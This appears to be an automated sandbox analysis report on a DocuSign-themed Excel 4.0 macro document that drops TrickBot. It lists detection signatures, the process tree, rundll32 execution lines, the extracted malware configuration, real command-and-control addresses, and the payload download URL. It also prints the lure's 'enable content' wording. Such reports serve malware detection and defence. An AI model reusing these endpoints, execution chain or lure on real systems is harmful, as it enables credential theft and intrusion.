Loading ...

Play interactive tourEdit tour

Analysis Report Sign-1870635479_637332644.xls

Overview

General Information

Sample Name:Sign-1870635479_637332644.xls
Analysis ID:355634
MD5:ecd29fe79bd4e7f1bae3ccd26f44397c
SHA1:a4e2f0650ac7b4642d43e0c0fbae293ce77a7a40
SHA256:77500283a6b0da3b616525a210b9fb82ab4dfde174a48ce4bad593c722a6cbb4
Tags:SilentBuilderTrickBotDocuSignRackspacexls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Trickbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Yara detected Trickbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Adds / modifies Windows certificates
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 920 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 1696 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2540 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 1976 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
        • wermgr.exe (PID: 2832 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • taskeng.exe (PID: 1192 cmdline: taskeng.exe {C999D15C-7BEE-4793-989A-0EF4E6A22007} S-1-5-18:NT AUTHORITY\System:Service: MD5: 65EA57712340C09B1B0C427B4848AE05)
    • rundll32.exe (PID: 1520 cmdline: C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor3154395120\ujBASEmc.rrd',DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

Threatname: Trickbot

{"gtag": "rob60", "C2 list": [], "modules": ["pwgrab", "mcconf"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Sign-1870635479_637332644.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x26ca2:$s1: Excel
  • 0x27d0a:$s1: Excel
  • 0x35b4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2098758914.0000000000230000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
    00000004.00000003.2094809366.0000000000324000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
      00000004.00000003.2094797786.0000000000324000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
        00000004.00000002.2099036393.0000000000878000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
          00000004.00000002.2098808409.00000000002F0000.00000004.00000020.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.rundll32.exe.230000.0.raw.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
              4.2.rundll32.exe.230000.0.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 920, ProcessCommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, ProcessId: 1696

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus detection for URL or domainShow sources
                Source: http://www.chipmania.it/mails/open.phpAvira URL Cloud: Label: malware
                Found malware configurationShow sources
                Source: wermgr.exe.2832.6.memstrMalware Configuration Extractor: Trickbot {"gtag": "rob60", "C2 list": [], "modules": ["pwgrab", "mcconf"]}
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesReversingLabs: Detection: 41%
                Source: C:\Users\user\BASE.BABAAReversingLabs: Detection: 41%
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: Process Memory Space: wermgr.exe PID: 2832, type: MEMORY
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007BCA0 CryptAcquireContextW,

                Compliance:

                barindex
                Uses insecure TLS / SSL version for HTTPS connectionShow sources
                Source: unknownHTTPS traffic detected: 45.155.173.242:443 -> 192.168.2.22:49166 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49170 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 176.58.123.25:443 -> 192.168.2.22:49171 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49173 version: TLS 1.0
                Uses new MSVCR DllsShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Binary contains paths to debug symbolsShow sources
                Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2100627167.000000006E419000.00000002.00020000.sdmp, BASE.BABAA.0.dr
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061290 FindFirstFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000646F0 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007FBB0 FindFirstFileW,SleepEx,FindNextFileW,

                Software Vulnerabilities:

                barindex
                Document exploit detected (drops PE files)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 10[1].jjkes.0.drJump to dropped file
                Document exploit detected (UrlDownloadToFile)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
                Source: excel.exeMemory has grown: Private usage: 4MB later: 48MB
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx ecx, word ptr [eax+02h]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov ecx, 00004E20h
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx edx, word ptr [eax]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc dword ptr [esp+40h]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc ecx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec ecx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then cmp byte ptr [ecx+edx+01h], 00000000h
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx eax, byte ptr [ebx]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc edx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx ebx, word ptr [eax]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov ebx, edx
                Source: global trafficDNS query: name: www.chipmania.it
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.155.173.242:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.81.0.78:80

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.22:49166 -> 45.155.173.242:443
                Source: TrafficSnort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.22:49170 -> 193.8.194.96:443
                Source: TrafficSnort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49170
                Source: TrafficSnort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49173
                Source: TrafficSnort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.22:49174 -> 5.202.150.151:447
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.202.150.151:447
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 103.220.47.220:447
                Source: Joe Sandbox ViewIP Address: 45.155.173.242 45.155.173.242
                Source: Joe Sandbox ViewIP Address: 5.202.150.151 5.202.150.151
                Source: Joe Sandbox ViewIP Address: 185.81.0.78 185.81.0.78
                Source: Joe Sandbox ViewIP Address: 194.5.249.156 194.5.249.156
                Source: Joe Sandbox ViewASN Name: COMBAHTONcombahtonGmbHDE COMBAHTONcombahtonGmbHDE
                Source: Joe Sandbox ViewASN Name: DIDEHABNNETIR DIDEHABNNETIR
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox ViewJA3 fingerprint: 8c4a22651d328568ec66382a84fc505f
                Source: global trafficHTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.chipmania.itConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 45.155.173.242:443 -> 192.168.2.22:49166 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49170 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 176.58.123.25:443 -> 192.168.2.22:49171 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49173 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.173.242
                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.173.242
                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.173.242
                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.173.242
                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.173.242
                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.173.242
                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.173.242
                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.173.242
                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.173.242
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.249.156
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.249.156
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.249.156
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.249.156
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.249.156
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.249.156
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 5.202.150.151
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 5.202.150.151
                Source: unknownTCP traffic detected without corresponding DNS query: 5.202.150.151
                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.173.242
                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.173.242
                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.173.242
                Source: unknownTCP traffic detected without corresponding DNS query: 5.202.150.151
                Source: unknownTCP traffic detected without corresponding DNS query: 5.202.150.151
                Source: unknownTCP traffic detected without corresponding DNS query: 5.202.150.151
                Source: unknownTCP traffic detected without corresponding DNS query: 103.220.47.220
                Source: unknownTCP traffic detected without corresponding DNS query: 103.220.47.220
                Source: unknownTCP traffic detected without corresponding DNS query: 103.220.47.220
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
                Source: global trafficHTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.chipmania.itConnection: Keep-Alive
                Source: rundll32.exe, 00000003.00000002.2101338428.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099089069.0000000001E10000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2370111419.0000000033B90000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364431540.00000000007E0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: unknownDNS traffic detected: queries for: www.chipmania.it
                Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.6.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
                Source: wermgr.exe, 00000006.00000003.2217176292.0000000033614000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                Source: wermgr.exe, 00000006.00000003.2217176292.0000000033614000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c5f3x
                Source: wermgr.exe, 00000006.00000003.2218495867.0000000033613000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c8
                Source: wermgr.exe, 00000006.00000003.2217176292.0000000033614000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                Source: wermgr.exe, 00000006.00000003.2217176292.0000000033614000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: wermgr.exe, 00000006.00000003.2217176292.0000000033614000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                Source: wermgr.exe, 00000006.00000003.2218495867.0000000033613000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsofv
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en&r
                Source: wermgr.exe, 00000006.00000002.2364517634.00000000003D1000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: rundll32.exe, 00000003.00000002.2101338428.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099089069.0000000001E10000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2370111419.0000000033B90000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364431540.00000000007E0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                Source: rundll32.exe, 00000003.00000002.2101338428.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099089069.0000000001E10000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2370111419.0000000033B90000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364431540.00000000007E0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                Source: rundll32.exe, 00000003.00000002.2101706813.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099318193.0000000001FF7000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2371380931.0000000033D77000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364622522.00000000009C7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                Source: rundll32.exe, 00000003.00000002.2101706813.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099318193.0000000001FF7000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2371380931.0000000033D77000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364622522.00000000009C7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: wermgr.exe, 00000006.00000003.2217176292.0000000033614000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0;
                Source: wermgr.exe, 00000006.00000003.2217176292.0000000033614000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
                Source: wermgr.exe, 00000006.00000002.2369701585.00000000337A0000.00000002.00000001.sdmp, taskeng.exe, 00000008.00000002.2364456344.0000000000770000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: wermgr.exe, 00000006.00000002.2372115954.0000000034180000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                Source: rundll32.exe, 00000003.00000002.2101706813.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099318193.0000000001FF7000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2371380931.0000000033D77000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364622522.00000000009C7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                Source: rundll32.exe, 00000003.00000002.2101706813.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099318193.0000000001FF7000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2371380931.0000000033D77000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364622522.00000000009C7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                Source: wermgr.exe, 00000006.00000002.2369701585.00000000337A0000.00000002.00000001.sdmp, taskeng.exe, 00000008.00000002.2364456344.0000000000770000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: rundll32.exe, 00000003.00000002.2101338428.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099089069.0000000001E10000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2370111419.0000000033B90000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364431540.00000000007E0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                Source: rundll32.exe, 00000003.00000002.2101706813.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099318193.0000000001FF7000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2371380931.0000000033D77000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364622522.00000000009C7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                Source: rundll32.exe, 00000003.00000002.2101338428.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099089069.0000000001E10000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2370111419.0000000033B90000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364431540.00000000007E0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                Source: rundll32.exe, 00000009.00000002.2364431540.00000000007E0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                Source: wermgr.exe, 00000006.00000002.2364517634.00000000003D1000.00000004.00000020.sdmpString found in binary or memory: https://103.220.47.220:447/rob60/134349_W617601.1D7953BB38B5711FB702EBB79BB8BAD5/5/pwgrab64/
                Source: wermgr.exe, 00000006.00000002.2369616233.00000000335C0000.00000004.00000001.sdmpString found in binary or memory: https://103.233.118.34:447/rob60/134349_W617601.1D7953BB38B5711FB702EBB79BB8BAD5/5/pwgrab64/
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp, wermgr.exe, 00000006.00000002.2369616233.00000000335C0000.00000004.00000001.sdmpString found in binary or memory: https://193.8.194.96/rob60/134349_W617601.1D7953BB38B5711FB702EBB79BB8BAD5/14/NAT%20status/client%20
                Source: wermgr.exe, 00000006.00000002.2364462409.000000000035A000.00000004.00000020.sdmpString found in binary or memory: https://45.155.173.242/rob60/134349_W617601.1D7953BB38B5711FB702EBB79BB8BAD5/5/file/
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: https://ident.me/
                Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443

                E-Banking Fraud:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: Process Memory Space: wermgr.exe PID: 2832, type: MEMORY

                System Summary:

                barindex
                Found malicious Excel 4.0 MacroShow sources
                Source: Sign-1870635479_637332644.xlsInitial sample: urlmon
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above . 15 16 Once you have enabled editing, please c
                Source: Screenshot number: 4Screenshot OCR: Enable content button " from the yellow bar above )1 23 24 25 26 27 28 29 30 31 32 33
                Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
                Source: Document image extraction number: 0Screenshot OCR: Enable content button from the yellow bar above I \ , I ' /
                Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
                Source: Document image extraction number: 1Screenshot OCR: Enable content button from the yellow bar above j'
                Found Excel 4.0 Macro with suspicious formulasShow sources
